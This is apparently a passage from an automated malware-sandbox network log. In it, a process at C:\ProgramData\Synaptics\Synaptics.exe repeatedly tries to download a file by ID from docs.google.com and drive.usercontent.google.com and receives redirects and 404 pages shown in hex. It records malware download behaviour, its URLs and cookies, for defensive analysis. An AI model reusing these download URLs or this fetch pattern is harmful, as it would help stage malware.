                                                                                            2025-01-02 19:29:54 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 4d 74 69 58 73 36 32 30 34 6c 6b 58 65 6e 31 76 69 46 51 36 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="iMtiXs6204lkXen1viFQ6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:54 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            56192.168.2.949988216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:54 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:55 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7sfKN0H37Su_9SJUFc-2GXhrwQoYbAj0saupF9Ob5GAqecY77dKUsfJ0j4uOeIaqDS
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:55 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-etMRvFvIMZcD9ZcYk71Skg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:55 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:55 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 7a 73 51 4e 4c 35 46 79 75 53 78 57 73 50 2d 77 69 62 54 65 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="szsQNL5FyuSxWsP-wibTeg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:55 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            57192.168.2.949989172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:54 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                                                                                            2025-01-02 19:29:55 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:55 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-iT5lVWVgE7ke6-SiFI2f5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            58192.168.2.949996216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:55 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:56 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4bJT-AK1xgGw6CXIPxi7ORxN_wPPXBsmFov6Lh2T1bW8dBHsg5gOhq56EmJ0BwNpZS
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:55 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-cFJ0x-YPeC1h8s5nXPZLmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:56 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:56 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 34 58 48 6d 4d 57 43 75 72 49 45 68 38 6a 62 77 71 71 70 6e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="e4XHmMWCurIEh8jbwqqpnQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:56 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            59192.168.2.949997172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:55 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=hVlbUWvKAsXXeF2w1QNF8q5JgoN1tzf87ge04HU4z-izoj3_LDtGDRc8bxdZ01BsH-o2bzsVRFQ5r_WfhaVrhAteUAMZUwwIBUUg2Bex0dX01kJtDPaFFK0wIq1WKZ5eH2OJNc4egmV2sSWKiE-nh0MxGmLMyVzjQur-zpbgCqpOWYbRsspUiMg
                                                                                            2025-01-02 19:29:55 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:55 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-NrXjg42GAlNoEv3u85DceQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            60192.168.2.950002172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:55 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=hVlbUWvKAsXXeF2w1QNF8q5JgoN1tzf87ge04HU4z-izoj3_LDtGDRc8bxdZ01BsH-o2bzsVRFQ5r_WfhaVrhAteUAMZUwwIBUUg2Bex0dX01kJtDPaFFK0wIq1WKZ5eH2OJNc4egmV2sSWKiE-nh0MxGmLMyVzjQur-zpbgCqpOWYbRsspUiMg
                                                                                            2025-01-02 19:29:56 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:56 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-UFbVF8UnWTwn1tby_1LulQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            61192.168.2.950004216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:55 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:56 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC5yipHIJRURjqsV3fqP1rVDuJ_E4E5DWPLypA59nBORL4LA0vBSetivf7zBLfrnWG_U
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:56 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-guCN7p2yyVA0nTNM9Emksw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:56 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:56 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 54 79 72 2d 64 78 6f 2d 63 42 7a 70 36 66 50 36 54 6a 44 6c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="9Tyr-dxo-cBzp6fP6TjDlA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:56 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            62192.168.2.950007172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:56 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:57 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:56 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-XzuJM5sw8cp6UpgurRQ1Sg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
